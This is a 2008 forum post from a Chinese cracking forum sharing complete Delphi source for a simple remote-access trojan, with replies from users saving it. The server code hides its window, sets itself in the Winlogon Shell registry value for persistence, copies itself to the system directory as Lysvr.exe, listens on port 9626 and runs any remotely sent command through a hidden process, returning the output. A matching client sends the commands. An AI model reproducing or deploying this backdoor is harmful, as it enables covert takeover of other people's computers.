设为首页收藏本站官方微博
开启辅助访问 切换到窄版

飘云阁

 找回密码
 加入我们

QQ登录

只需一步,快速开始

[x86]PYG官方Dll优雅破解补丁制作工具[x64]PYG官方DLL优雅破解补丁制作工具[x86]PYG官方Exe优雅破解补丁制作工具[x86/x64]Baymax Patch Tools飘云阁工具包(已更新第4季)
返回列表 发新帖
查看: 2334|回复: 3

delphi写匿名管道简单木马

[复制链接]
xingke
  • TA的每日心情
    开心
    2023-4-6 10:07

    • 签到天数: 23 天

    [LV.4]偶尔看看III
    发表于 2008-1-30 14:21:55 | 显示全部楼层 |阅读模式
    delphi写匿名管道简单木马(转)
    ////Server.pas//////////////
    unit UtMain;

    ////////////////////////////////////
    //////////BY Smias////////////////
    ////////Email:China_Smias@Hotail.Com////
    ////////QQ:9661800////////////////
    ////////////////////////////////

    interface

    uses
    Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
    Dialogs, Registry, ScktComp, StdCtrls;

    type
    TFmMain = class(TForm)
    SS: TServerSocket;
    Memo1: TMemo;
    procedure FormCreate(Sender: TObject);
    procedure SSAccept(Sender: TObject; Socket: TCustomWinSocket);
    procedure SSClientRead(Sender: TObject; Socket: TCustomWinSocket);
    private
    { Private declarations }
    public
    { Public declarations }
    end;

    var
    FmMain: TFmMain;
    reg:TRegistry;

    implementation

    {$R *.dfm}

    procedure TFmMain.FormCreate(Sender: TObject);
    var
    sysdir:array[0..50] of char;
    begin
    Application.ShowMainForm:=False;
    FmMain.Left:=-200; //运行不显示窗口
    reg:=TRegistry.Create;
    reg.RootKey:=HKEY_LOCAL_MACHINE;
    reg.OpenKey('SoftWare\Microsoft\Windows NT\CurrentVersion\Winlogon',true);
    if reg.ReadString('Shell')<> 'Explorer.exe Lysvr.exe' then
    reg.WriteString('Shell','Explorer.exe Lysvr.exe'); //建立开机启动项
    reg.Free;
    GetSystemDirectory(sysdir,50);
    if not FileExists(sysdir+'\Lysvr.exe') then
    copyfile(Pchar(Application.exeName),pchar(sysdir+'\Lysvr.exe'),true);

    SS.Port:=9626;
    try
    SS.Active:=True;
    except
    end;
    end;

    procedure TFmMain.SSAccept(Sender: TObject; Socket: TCustomWinSocket);
    begin
    Socket.SendText('连接成功'); //发现有连接时回传‘连接成功 ’
    end;

    procedure TFmMain.SSClientRead(Sender: TObject; Socket: TCustomWinSocket);
    var
    RemoteCmd:string;
    hReadPipe,hWritePipe:THandle;
    si:STARTUPINFO;
    lsa:SECURITY_ATTRIBUTES;
    pi:PROCESS_INFORMATION;
    cchReadBuffer:DWORD;
    ph:PChar;
    fname:PChar;
    res:string;
    begin
    Memo1.Clear;
    remotecmd:=Socket.ReceiveText;
    fname:=allocmem(255);
    ph:=AllocMem(5000);
    lsa.nLength :=sizeof(SECURITY_ATTRIBUTES);
    lsa.lpSecurityDescriptor :=nil;
    lsa.bInheritHandle :=True;
    if CreatePipe(hReadPipe,hWritePipe,@lsa,0)=false then
    begin
    socket.SendText('不能创建管道');
    exit;
    end;
    fillchar(si,sizeof(STARTUPINFO),0);
    si.cb:=sizeof(STARTUPINFO);
    si.dwFlags:=(STARTF_USESTDHANDLES or STARTF_USESHOWWINDOW);
    si.wShowWindow:=SW_HIDE;
    si.hStdOutput:=hWritePipe;
    StrPCopy(fname,remotecmd);
    /////执行CMD命令////
    if CreateProcess(nil,fname,nil,nil,true,0,nil,nil,si,pi)=False then
    begin
    socket.SendText('不能创建进程');
    FreeMem(ph);
    FreeMem(fname);
    Exit;
    end;
    while(true) do
    begin
    if not PeekNamedPipe(hReadPipe,ph,1,@cchReadBuffer,nil,nil) then break;
    if cchReadBuffer<>0 then
    begin
    if ReadFile(hReadPipe,ph^,4096,cchReadBuffer,nil)=false then break;
    ph[cchReadbuffer]:=chr(0);
    Memo1.Lines.Add(ph);
    end
    else
    if(WaitForSingleObject(pi.hProcess ,0)=WAIT_OBJECT_0) then break;
    Sleep(100);
    end;
    ph[cchReadBuffer]:=chr(0);
    Memo1.Lines.Add(ph); //memo接收回显
    CloseHandle(hReadPipe);
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    CloseHandle(hWritePipe);
    FreeMem(ph);
    FreeMem(fname);
    socket.SendText(Memo1.Text); ///将回显发送回客户端
    end;

    end.

    ///////////////////////////////////////////////////////////////////////////////////////////

    //////客户端/////////////////////

    unit UtMain;

    ////////////////////////////////////
    //////////BY Smias////////////////
    ////////Email:China_Smias@Hotail.Com////
    ////////QQ:9661800////////////////
    ////////////////////////////////

    interface

    uses
    Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
    Dialogs, OleCtrls, SHDocVw, StdCtrls, IdBaseComponent, IdComponent,
    IdUDPBase, IdUDPServer, Buttons, TLHelp32, ScktComp;

    type
    TFmMain = class(TForm)
    WebBrowser1: TWebBrowser;
    Label3: TLabel;
    Edit2: TEdit;
    Label4: TLabel;
    Edit3: TEdit;
    Button2: TButton;
    CS: TClientSocket;
    Edit4: TEdit;
    Label5: TLabel;
    Memo1: TMemo;
    BitBtn2: TBitBtn;
    procedure Button2Click(Sender: TObject);
    procedure CSRead(Sender: TObject; Socket: TCustomWinSocket);
    procedure BitBtn2Click(Sender: TObject);
    private
    { Private declarations }
    public
    { Public declarations }
    end;

    var
    FmMain: TFmMain;

    implementation

    {$R *.dfm}

    procedure TFmMain.Button2Click(Sender: TObject);
    begin
    CS.Host:=Edit2.Text;
    CS.Port:=StrToInt(Edit3.Text);
    CS.Open;
    end;

    procedure TFmMain.CSRead(Sender: TObject; Socket: TCustomWinSocket);
    begin
    Memo1.Clear;
    Memo1.Lines.Add(Socket.ReceiveText);
    Memo1.Lines.Add('');
    end;

    procedure TFmMain.BitBtn2Click(Sender: TObject);
    begin
    CS.Socket.SendText(edit4.Text);
    end;

    end.
    delphi, 管道, 木马, 匿名

    相关帖子

    PYG19周年生日快乐!
    回复

    使用道具 举报

    SHPig

    该用户从未签到
    发表于 2008-2-10 02:30:55 | 显示全部楼层
    :loveliness: 保存下来
    PYG19周年生日快乐!
    回复 支持 反对

    使用道具 举报

    woainioo7

    该用户从未签到
    发表于 2008-2-18 00:57:34 | 显示全部楼层
    暂时还看不懂 以后会用的/:001
    PYG19周年生日快乐!
    回复 支持 反对

    使用道具 举报

    anson2416

    该用户从未签到
    发表于 2008-4-8 13:49:40 | 显示全部楼层
    保存了
    很棒~~
    PYG19周年生日快乐!
    回复 支持 反对

    使用道具 举报

    返回列表 发新帖
    高级模式
    B Color Image Link Quote Code Smilies
    您需要登录后才可以回帖 登录 | 加入我们

    本版积分规则

    快速回复 返回顶部 返回列表